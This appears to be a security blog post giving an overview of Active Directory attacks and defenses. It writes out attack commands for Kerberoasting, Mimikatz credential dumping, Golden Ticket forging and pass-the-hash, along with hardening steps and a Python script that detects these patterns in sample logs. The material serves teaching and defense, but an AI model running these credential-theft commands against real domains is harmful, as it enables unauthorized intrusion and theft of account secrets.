Active Directory (AD) remains the backbone of corporate networks and a primary target in Red Team operations and penetration testing. This guide covers essential AD components, attack techniques, and defense strategies.
Essential AD Components
- Domain Controllers (DCs): Manage authentication and authorization.
- Active Directory Database (NTDS.dit): Stores user credentials and hashes.
- Kerberos: Authentication protocol used in AD environments.
- Group Policy Objects (GPOs): Enforce security policies across the network.
- Organizational Units (OUs): Logical containers for AD objects.
Typical Attack Lifecycle
1. Reconnaissance: Gather AD information using tools like `ldapsearch` and BloodHound.
2. Initial Access: Exploit weak credentials, phishing, or misconfigurations.
3. Privilege Escalation: Use tools like `Mimikatz` to extract credentials.
4. Lateral Movement: Pass-the-hash, pass-the-ticket, or RDP hijacking.
5. Persistence: Golden/Silver Ticket attacks or backdoor creation.
Key Attack Techniques
1. Kerberoasting
Extract service account hashes and crack them offline:
GetUserSPNs.py -request -dc-ip <DC_IP> domain/user
2. Mimikatz (Credential Dumping)
Extract plaintext passwords and hashes from memory:
mimikatz.exe "sekurlsa::logonpasswords"
3. Golden Ticket Attack
Forge TGT (Ticket Granting Ticket) using KRBTGT hash:
mimikatz.exe "kerberos::golden /domain:domain.com /sid:S-1-5-21-... /krbtgt:<hash> /user:Administrator"
4. Pass-the-Hash (PtH)
Authenticate without plaintext passwords:
psexec.py -hashes <LM:NTLM_hash> user@target
Fundamental Defense Strategies
- Enable LSA Protection: Prevent credential dumping via Mimikatz.
- Implement Strong Password Policies: Enforce long, complex passwords.
- Monitor Kerberos Logs: Detect Golden Ticket attacks via Event ID 4769 (Kerberos service ticket requests).
- Restrict Admin Privileges: Use the principle of least privilege.
- Regularly Patch Systems: Prevent exploitation of known vulnerabilities.
You Should Know:
1. Enumerate AD with PowerView
Get-NetUser | Select-Object samaccountname,description
Get-NetGroup -GroupName "Domain Admins"
2. BloodHound for AD Mapping
bloodhound-python -d domain.com -u user -p 'password' -ns <DC_IP> -c All
3. Detect Abnormal Logins
Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4624,4625} | Format-List
4. Secure NTLM Authentication
Disable NTLM where possible; where it cannot be removed, the value 5 below restricts the host to NTLMv2 and refuses LM and NTLMv1 responses:
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\" -Name "LmCompatibilityLevel" -Value 5
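The "Monitor Kerberos Logs" and "Detect Abnormal Logins" items above can be turned into offline detection logic run over exported Security log events. The script below is an added example (not part of the original post): it works on constructed 4768/4769 records whose field names are assumptions, and flags two patterns, a burst of RC4-encrypted service ticket requests for many SPNs from one account (Kerberoasting) and a service ticket request with no preceding TGT request for that account (a forged TGT is never issued by a DC, so it leaves no 4768).

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events (not real logs). Field names are assumptions that
# mirror Security log properties of 4768 (TGT request) and 4769 (TGS request).
EVENTS = [
    {"id": 4768, "time": "2024-05-01T09:00:00", "account": "alice", "ip": "10.0.0.5"},
    {"id": 4769, "time": "2024-05-01T09:00:05", "account": "alice", "ip": "10.0.0.5", "service": "cifs/fs01", "enc": "0x12"},
    # One account requesting RC4 (0x17) tickets for many SPNs in seconds: Kerberoasting pattern
    {"id": 4768, "time": "2024-05-01T09:10:00", "account": "bob", "ip": "10.0.0.9"},
    {"id": 4769, "time": "2024-05-01T09:10:01", "account": "bob", "ip": "10.0.0.9", "service": "MSSQLSvc/db01", "enc": "0x17"},
    {"id": 4769, "time": "2024-05-01T09:10:02", "account": "bob", "ip": "10.0.0.9", "service": "http/web01", "enc": "0x17"},
    {"id": 4769, "time": "2024-05-01T09:10:03", "account": "bob", "ip": "10.0.0.9", "service": "MSSQLSvc/db02", "enc": "0x17"},
    # Service ticket for an account with no TGT request in the window: forged-TGT (Golden Ticket) pattern
    {"id": 4769, "time": "2024-05-01T09:20:00", "account": "Administrator", "ip": "10.0.0.77", "service": "cifs/dc01", "enc": "0x12"},
]

RC4_HMAC = "0x17"  # TicketEncryptionType value for RC4, the crackable type Kerberoasting asks for

def detect_kerberoasting(events, min_spns=3, window=timedelta(minutes=5)):
    """Return accounts that requested RC4 service tickets for >= min_spns distinct SPNs within `window`."""
    by_account = defaultdict(list)
    for e in events:
        if e["id"] == 4769 and e["enc"] == RC4_HMAC:
            by_account[e["account"]].append(e)
    flagged = set()
    for account, reqs in by_account.items():
        reqs.sort(key=lambda e: e["time"])
        for i, first in enumerate(reqs):  # slide a window starting at each request
            start = datetime.fromisoformat(first["time"])
            spns = {e["service"] for e in reqs[i:] if datetime.fromisoformat(e["time"]) - start <= window}
            if len(spns) >= min_spns:
                flagged.add(account)
                break
    return sorted(flagged)

def detect_tgs_without_tgt(events, lookback=timedelta(hours=10)):
    """Return (account, service) pairs for 4769 events with no 4768 for that account within `lookback`.
    Caveat: 4768 may have been logged on another DC, so feed events from all DCs before relying on this."""
    tgts = [(e["account"], datetime.fromisoformat(e["time"])) for e in events if e["id"] == 4768]
    flagged = []
    for e in events:
        if e["id"] != 4769:
            continue
        t = datetime.fromisoformat(e["time"])
        if not any(a == e["account"] and timedelta(0) <= t - ts <= lookback for a, ts in tgts):
            flagged.append((e["account"], e["service"]))
    return flagged
```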
What Undercode Says
Active Directory is a critical attack surface in enterprise networks. Understanding both offensive and defensive techniques is crucial for penetration testers and security professionals. Regular audits, strong credential hygiene, and monitoring for suspicious activities can mitigate most AD-based attacks.
Expected Output:
- A mapped AD environment with potential attack paths.
- Extracted credentials for privilege escalation.
- Detection of misconfigurations leading to lateral movement.
Reported By: Dharamveer Prasad – Hackers Feeds